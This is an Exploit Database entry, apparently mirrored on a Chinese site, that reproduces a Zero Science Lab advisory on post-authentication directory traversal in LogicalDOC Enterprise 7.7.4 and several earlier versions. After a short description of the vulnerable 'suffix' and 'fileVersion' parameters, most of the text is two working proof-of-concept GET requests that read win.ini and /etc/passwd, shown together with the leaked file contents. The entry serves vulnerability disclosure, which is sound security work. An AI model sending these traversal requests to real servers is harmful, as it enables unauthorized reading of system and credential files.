LogicalDOC Enterprise 7.7.4 – Directory Traversal

• Exploit Database
• 104 阅读

• 作者： LiquidWorm
  日期： 2018-02-12
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/44019/

• LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities
  
  
  Vendor: LogicalDOC Srl
  Product web page: https://www.logicaldoc.com
  Affected version: 7.7.4
  7.7.3
  7.7.2
  7.7.1
  7.6.4
  7.6.2
  7.5.1
  7.4.2
  7.1.1
  
  Summary: LogicalDOC is a free document management system that is designed
  to handle and share documents within an organization. LogicalDOC is a content
  repository, with Lucene indexing, Activiti workflow, and a set of automatic
  import procedures.
  
  Desc: The application suffers from multiple post-auth file disclosure vulnerability
  when input passed thru the 'suffix' and 'fileVersion' parameters is not properly
  verified before being used to include files. This can be exploited to read arbitrary
  files from local resources with directory traversal attacks.
  
  Tested on: Microsoft Windows 10
   Linux Ubuntu 16.04
   Java 1.8.0_161
   Apache-Coyote/1.1
   Apache Tomcat/8.5.24
   Apache Tomcat/8.5.13
   Undisclosed 8.41
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2018-5450
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5450.php
  
  
  26.01.2018
  
  ---
  
  
  PoC #1:
  
  GET /thumbnail?docId=3375114&random=1517220341243&suffix=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
  Host: localhost:8080
  
  
  Response:
  
  ; for 16-bit app support
  [fonts]
  [extensions]
  [mci extensions]
  [files]
  [Mail]
  MAPI=1
  [MCI Extensions.BAK]
  3g2=MPEGVideo
  3gp=MPEGVideo
  3gp2=MPEGVideo
  3gpp=MPEGVideo
  aac=MPEGVideo
  adt=MPEGVideo
  adts=MPEGVideo
  m2t=MPEGVideo
  m2ts=MPEGVideo
  m2v=MPEGVideo
  m4a=MPEGVideo
  m4v=MPEGVideo
  mod=MPEGVideo
  mov=MPEGVideo
  mp4=MPEGVideo
  mp4v=MPEGVideo
  mts=MPEGVideo
  ts=MPEGVideo
  tts=MPEGVideo
  
  
  
  PoC #2:
  
  GET /convertpdf?docId=2450&control=preview&fileVersion=../../../../../../etc/passwd HTTP/1.1
  Host: localhozt:8080
  
  
  Response:
  
  HTTP/1.1 200 
  Cache-Control: must-revalidate, post-check=0,pre-check=0
  Expires: 0
  Content-Disposition: attachment; filename="=?UTF-8?B?MDkyMDEyMzEwNTVTUFQgMDA0LnBkZi5wZGY=?="
  Pragma: public
  Content-Type: application/pdf;charset=UTF-8
  Content-Length: 964
  Date: Mon, 05 Feb 2018 21:30:59 GMT
  Connection: close
  
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  sync:x:4:100:sync:/bin:/bin/sync
  games:x:5:100:games:/usr/games:/bin/sh
  ...
  ...
  

  Java

  Copy